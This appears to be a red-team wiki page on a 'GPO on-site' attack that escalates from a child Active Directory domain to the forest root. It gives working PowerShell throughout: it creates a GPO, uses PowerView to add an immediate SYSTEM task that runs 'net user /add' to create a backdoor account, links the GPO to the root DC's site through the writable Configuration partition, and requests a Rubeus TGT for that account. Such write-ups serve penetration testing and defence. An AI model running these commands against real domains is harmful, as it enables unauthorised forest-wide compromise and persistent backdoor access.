GPO On-Site Attack
Last updated
This technique can be used to move from a child domain to the parent (forest root) domain. It relies on two facts: a GPO link on an Active Directory site is stored in the Configuration partition, which replicates to every DC in the forest, and the child DC holds a writable replica of that partition, so SYSTEM on the child DC can add such a link. The steps are the following:

1. Create a malicious GPO on the child DC.
2. Query the root domain to identify the AD site that the root DC belongs to.
3. As SYSTEM on the child DC, link the created GPO to the site of the root DC.
4. Once the Configuration partition has replicated, confirm on the root DC that the site now links to the created GPO.
We start by creating a GPO in the child domain, from the child DC:

```powershell
# GPO created in the child domain; the display name is reused below
$gpo = "Something"
New-GPO $gpo
```
With that set up, we create an immediate scheduled task inside that GPO. Immediate tasks run as SYSTEM on every computer that applies the GPO, so when the root DC applies it, `net user /add` creates a domain account in the root domain:

```powershell
Import-Module .\PowerView_2.ps1
New-GPOImmediateTask -Verbose -Force -TaskName 'Something' -GPODisplayName "Something" -Command C:\Windows\System32\cmd.exe -CommandArguments "/c net user otter SomethingSecure123! /add"
```
We can verify that the task has been added in the Group Policy Management Editor (Computer Configuration > Preferences > Control Panel Settings > Scheduled Tasks). While there, make sure the task's "Run a new instance in parallel" option is set (under Settings, "If the task is already running").
After this, it is time to link the GPO to the site of the root DC. First retrieve the site: the ServerObjectDN of the root DC has the form `CN=<DC>,CN=Servers,CN=<site>,CN=Sites,CN=Configuration,DC=...`, so the site is the third RDN.

```powershell
Get-ADDomainController -Server domain.com | Select ServerObjectDN
```

Then link the GPO to that site from a SYSTEM shell on the child DC (the child domain is dev.domain.com here):

```powershell
$sitePath = "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=DOMAIN,DC=COM"
New-GPLink -Name "Something" -Target $sitePath -Server dev.domain.com
```
Now we wait for the Configuration partition to replicate to the root DC and for the root DC's next Group Policy refresh (DCs refresh every 5 minutes by default); the immediate task then runs as SYSTEM on the root DC and creates the user in the root domain. Finally, request a TGT for the backdoored user from the parent domain:

```powershell
.\Rubeus.exe asktgt /user:otter /password:'SomethingSecure123!' /domain:domain.com /ptt
```